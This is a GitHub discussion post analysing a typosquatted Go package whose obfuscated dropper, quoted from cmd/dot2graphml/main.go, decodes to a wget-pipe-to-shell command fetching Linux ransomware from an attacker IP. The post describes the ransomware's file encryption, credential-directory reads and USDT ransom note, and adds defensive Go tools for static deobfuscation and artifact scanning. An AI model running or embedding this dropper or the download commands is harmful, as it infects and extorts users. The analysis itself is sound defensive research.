Another typosquatting campaign targeting Go packages delivers ransomware malware for the Linux desktop · evilsocket opensnitch · Discussion #1290


Recently there have been a couple of posts from socket.dev and @hougesen documenting and warning about a new typosquatting campaign targeting Go packages:

https://socket.dev/blog/typosquatted-go-packages-deliver-malware-loader
https://mhouge.dk/blog/rogue-one-a-malware-story

I wanted to test it with opensnitch, but all the repos were unavailable except one: github.com/ornatedoctrin/layout

The malicious payload is obfuscated inside the file cmd/dot2graphml/main.go:

    BDMB := []string{".", "4", " ", "t", "4", "i", "d", "r", "1", "J", "p", "/", " ", ".", ".", "e", "O", "t", "g", "7", "h", "t", "4", "e", "/", "7", "n", "d", " ", "g", "d", "f", "s", "4", "w", "5", "/", " ", "/", "s", "3", "-", "&", ":", "1", "7", "/", "d", " ", " ", "3", "t", "4", "/", "4", "o", "c", "d", "/", "|", "b", "0", "6", "e", "c", "-", "a", "b"}
    OUmUkri := runtime.GOOS == "linux" // gate: the payload only runs on Linux
    JDQb := "/bin/sh"                   // interpreter for the reassembled command
    wmbp := "-c"
    MntcdIC := BDMB[34] + BDMB[29] + BDMB[63] + BDMB[3] + BDMB[48] + BDMB[65] + BDMB[16] + BDMB[37] + BDMB[41] + BDMB[12] + BDMB[20] + BDMB[51] + BDMB[21] + BDMB[10] + BDMB[43] + BDMB[24] + BDMB[38] + BDMB[44] + BDMB[54] + BDMB[25] + BDMB[14] + BDMB[33] + BDMB[35] + BDMB[13] + BDMB[1] + BDMB[4] + BDMB[0] + BDMB[52] + BDMB[8] + BDMB[36] + BDMB[32] + BDMB[17] + BDMB[55] + BDMB[7] + BDMB[66] + BDMB[18] + BDMB[23] + BDMB[53] + BDMB[6] + BDMB[15] + BDMB[50] + BDMB[19] + BDMB[40] + BDMB[57] + BDMB[61] + BDMB[27] + BDMB[31] + BDMB[46] + BDMB[56] + BDMB[64] + BDMB[30] + BDMB[45] + BDMB[60] + BDMB[22] + BDMB[62] + BDMB[47] + BDMB[2] + BDMB[59] + BDMB[28] + BDMB[58] + BDMB[67] + BDMB[5] + BDMB[26] + BDMB[11] + BDMB[39] + BDMB[9] + BDMB[49] + BDMB[42]
    if OUmUkri {
        // MntcdIC is rebuilt above by indexing the shuffled character table; it is
        // handed to /bin/sh -c and started in the background without waiting
        exec.Command(JDQb, wmbp, MntcdIC).Start()
    }

which translates to the shell command: wget -O - http://147.45.44.41/storage/de373d0df/ccd7b46d | /bin/sh &
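The obfuscation above is purely static: a character table plus a fixed sequence of index lookups, so the command can be recovered without running anything. The following is an added example (not code from the post, the opensnitch project, or the malicious package) that parses Go source with the standard `go/parser`, binds every `[]string{...}` literal element and string variable it sees, and prints the argv of each `exec.Command(...)` call with the concatenations resolved. The embedded `obfuscatedSample` is a constructed stand-in with the same shape but a harmless command; to use it on the real sample, pass the contents of `cmd/dot2graphml/main.go` to `ExtractExecCommands` instead.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"go/types"
	"strconv"
)

// Constructed stand-in for the cmd/dot2graphml/main.go fragment quoted above:
// same shape (shuffled character table, index concatenation, exec.Command) but a
// harmless command; imports and the GOOS check are left out because the parser
// does not need them. This is not the real dropper source.
const obfuscatedSample = `package main

func main() {
	BDMB := []string{"o", "e", "c", " ", "h", "k"}
	JDQb := "/bin/sh"
	wmbp := "-c"
	MntcdIC := BDMB[1] + BDMB[2] + BDMB[4] + BDMB[0] + BDMB[3] + BDMB[0] + BDMB[5]
	exec.Command(JDQb, wmbp, MntcdIC).Start()
}
`

// env maps a source expression ("JDQb", "BDMB[34]") to its recovered value.
type env map[string]string

// eval statically evaluates the expression forms the obfuscator emits:
// string literals, identifiers and table[index] bound earlier, and "+" joins.
func (r env) eval(e ast.Expr) (string, bool) {
	switch x := e.(type) {
	case *ast.BasicLit:
		s, err := strconv.Unquote(x.Value)
		return s, x.Kind == token.STRING && err == nil
	case *ast.Ident, *ast.IndexExpr:
		s, ok := r[types.ExprString(e)]
		return s, ok
	case *ast.BinaryExpr:
		l, okL := r.eval(x.X)
		rr, okR := r.eval(x.Y)
		return l + rr, x.Op == token.ADD && okL && okR
	}
	return "", false
}

// bind records one short variable declaration: a []string{...} literal is
// stored element by element under "name[i]", anything else under "name".
func (r env) bind(name string, rhs ast.Expr) {
	if cl, ok := rhs.(*ast.CompositeLit); ok {
		for i, el := range cl.Elts {
			if s, ok := r.eval(el); ok {
				r[fmt.Sprintf("%s[%d]", name, i)] = s
			}
		}
	} else if s, ok := r.eval(rhs); ok {
		r[name] = s
	}
}

// ExtractExecCommands parses Go source text and returns the argv of every
// exec.Command(...) call, with arguments resolved through the string table.
func ExtractExecCommands(src string) ([][]string, error) {
	f, err := parser.ParseFile(token.NewFileSet(), "sample.go", src, 0)
	if err != nil {
		return nil, err
	}
	r, cmds := env{}, [][]string{}
	ast.Inspect(f, func(n ast.Node) bool { // nodes arrive in source order
		switch x := n.(type) {
		case *ast.AssignStmt:
			if id, ok := x.Lhs[0].(*ast.Ident); ok && len(x.Lhs) == 1 && len(x.Rhs) == 1 {
				r.bind(id.Name, x.Rhs[0])
			}
		case *ast.CallExpr:
			if types.ExprString(x.Fun) != "exec.Command" {
				return true
			}
			var argv []string
			for _, a := range x.Args {
				s, ok := r.eval(a)
				if !ok {
					s = "<unresolved>" // keep the slot so argv positions stay meaningful
				}
				argv = append(argv, s)
			}
			cmds = append(cmds, argv)
		}
		return true
	})
	return cmds, nil
}

func main() {
	cmds, _ := ExtractExecCommands(obfuscatedSample)
	fmt.Printf("%q\n", cmds) // recovered argv: "/bin/sh" "-c" "echo ok"
}
```

Because nothing is executed, this is safe to run on the untrusted source itself; an argument that cannot be resolved statically (a value read at runtime, for instance) shows up as `<unresolved>` rather than being silently dropped, so the analyst knows which part still needs dynamic analysis.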

This URL was unavailable when I tested it, but I was able to download one of the other binaries documented by the socket.dev researchers: https://carvecomi.fun/storage/de373d0df/f0eee999

According to socket.dev, this was just yet-another-cryptominer:

> Initially, f0eee999 shows minimal malicious behavior (such as reading /sys/kernel/mm/transparent_hugepage/), which aligns with a cryptominer or loader that remains dormant until conditions are met. Because it depends on common Linux utilities like /bin/sh, wget, and bash, the campaign specifically targets UNIX-like environments (Linux and macOS), placing developers using these systems at risk.

However, this is not a cryptominer: it's ransomware that encrypts files in the Documents/ folder, among others.

  1. It's obfuscated with Garble and can be deobfuscated with gostringungarbler. The plain-text strings of the binary: https://pastebin.com/ehf4jNub

  2. First, it checks whether the directory Documents/ exists in the home of the user who launched the ransomware. If it doesn't exist, it does not continue. It also checks whether the file ./check_local.txt exists, and exits in that case.

  3. It executes setxkbmap -query to obtain the configured keyboard layout.

  4. It creates the files RUN_THIS_APP, DO_NOT_DELETE_THIS_FILE.txt and READ_ME.txt in /home/$user, /home/$user/Desktop, /home/$user/Downloads and /home/$user/Documents.

    Some of your files in the Documents folder have been encrypted in a zip archive with a password. If you want to decrypt the files and get the password from the archives, you need to run RUN_THIS_APP application from Terminal. To do this, navigate to folder with this file via Terminal and run the command ./RUN_THIS_APP
    DO NOT modify or delete this file because it prevents further file encryption and it also contains an important ID for data decryption.

    You will find all the information in the READ_ME.txt

    ###cfa989f9653d7ca494da1ca9c7ce9c70###

And proceeds to encrypt the user files with AES:
[screenshot: files-encrypted]

  5. It also reads /home/x/.bash_history, /home/x/.config/*, /home/x/.ssh/ and /home/x/.local dirs. Basically all the directories of the user.

  6. It opens several connections to usdt.tokenview.io, apilist.tronscanapi.com and blockchair.com.

  7. It tries to display a message dialog to the user, but it didn't work in my case, so I had to run it manually (better testing is needed):

    /usr/bin/zenity --warning --title Decryptor --text Some of your files in the Documents folder were encrypted in zip archives with a password. If you want to decrypt the files and get the password from the archives, you need to send 1000 USDT to the address below

    TJnJ8TWMCvbnRvzCXjsvrBLVbwebsFBpr9
    Network : TRC-20
    Balance: 0

    You can make a test payment with any number of coins, but when the balance on the address is 1000 USDT or more, you will receive a password to the archives, as well as other options such as automatic decryption of all archives. After sending a payment, just open this app again.

Note: if you execute the dropped binary RUN_THIS_APP (which is the same as the f0eee999 binary), it'll try to connect to the Xorg socket under /home/<current_user>/.Xauthority, and will display this very same message. If you do it under a different user than the one who launched X, it'll fail.

[screenshot: ransom-message]
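The file names and drop locations listed in the steps above are the cheapest host-level indicators to check on a machine that may have built one of the typosquatted packages. The following is an added example, not a tool from the post or from opensnitch, that stats the three dropped names in the four directories named above for every home directory and pulls the `###id###` line out of any note it finds. Treating that line as a 32-hex-character victim ID is an assumption generalised from the single note shown above.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
)

// Names and locations come from the behaviour described in the post; the
// victim-ID line format (###<32 hex chars>###) is an assumption generalised
// from the one note shown above.
var (
	droppedNames = []string{"RUN_THIS_APP", "DO_NOT_DELETE_THIS_FILE.txt", "READ_ME.txt"}
	dropDirs     = []string{".", "Desktop", "Downloads", "Documents"}
	idLine       = regexp.MustCompile(`^###([0-9a-f]{32})###$`)
)

// Finding is one dropped artifact found under a home directory.
type Finding struct {
	Path string // absolute path of the artifact
	ID   string // victim ID parsed from a note, "" if absent or not a note
}

// extractID returns the ###id### marker line from a text note, or "".
func extractID(path string) string {
	f, err := os.Open(path)
	if err != nil {
		return ""
	}
	defer f.Close()
	sc := bufio.NewScanner(f)
	for sc.Scan() {
		if m := idLine.FindStringSubmatch(sc.Text()); m != nil {
			return m[1]
		}
	}
	return ""
}

// ScanHome checks the four drop locations under one home directory and
// reports every artifact present. Only .txt notes are parsed for an ID; the
// RUN_THIS_APP binary is reported but never opened.
func ScanHome(home string) []Finding {
	var out []Finding
	for _, dir := range dropDirs {
		for _, name := range droppedNames {
			p := filepath.Join(home, dir, name)
			st, err := os.Stat(p)
			if err != nil || !st.Mode().IsRegular() {
				continue
			}
			f := Finding{Path: p}
			if filepath.Ext(name) == ".txt" {
				f.ID = extractID(p)
			}
			out = append(out, f)
		}
	}
	return out
}

// main walks every directory under /home (or the root given as argv[1]) so a
// single run covers all local users, e.g. from a rescue shell.
func main() {
	root := "/home"
	if len(os.Args) > 1 {
		root = os.Args[1]
	}
	entries, err := os.ReadDir(root)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	for _, e := range entries {
		if !e.IsDir() {
			continue
		}
		for _, f := range ScanHome(filepath.Join(root, e.Name())) {
			fmt.Printf("%s\tid=%s\n", f.Path, f.ID)
		}
	}
}
```

The scanner only stats and reads; it never executes RUN_THIS_APP, which, as the note above explains, is the same binary as f0eee999. An empty result list for a clean home keeps it usable in a loop over many machines.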

--

The file f0eee999 is detected as malware by many security vendors: https://www.virustotal.com/gui/file/b0d20a3dcb937da1ddb01684f6040bdbb920ac19446364e949ee8ba5b50a29e4/community

[screenshot: vt]

but the Behavior tab does not report all the malware activity described above. There's one comment from a contributor who, 9 days ago, described in detail how the malware behaves:

[screenshot: vt-contributor]

--

[video: go-typosquatting-screen0.webm]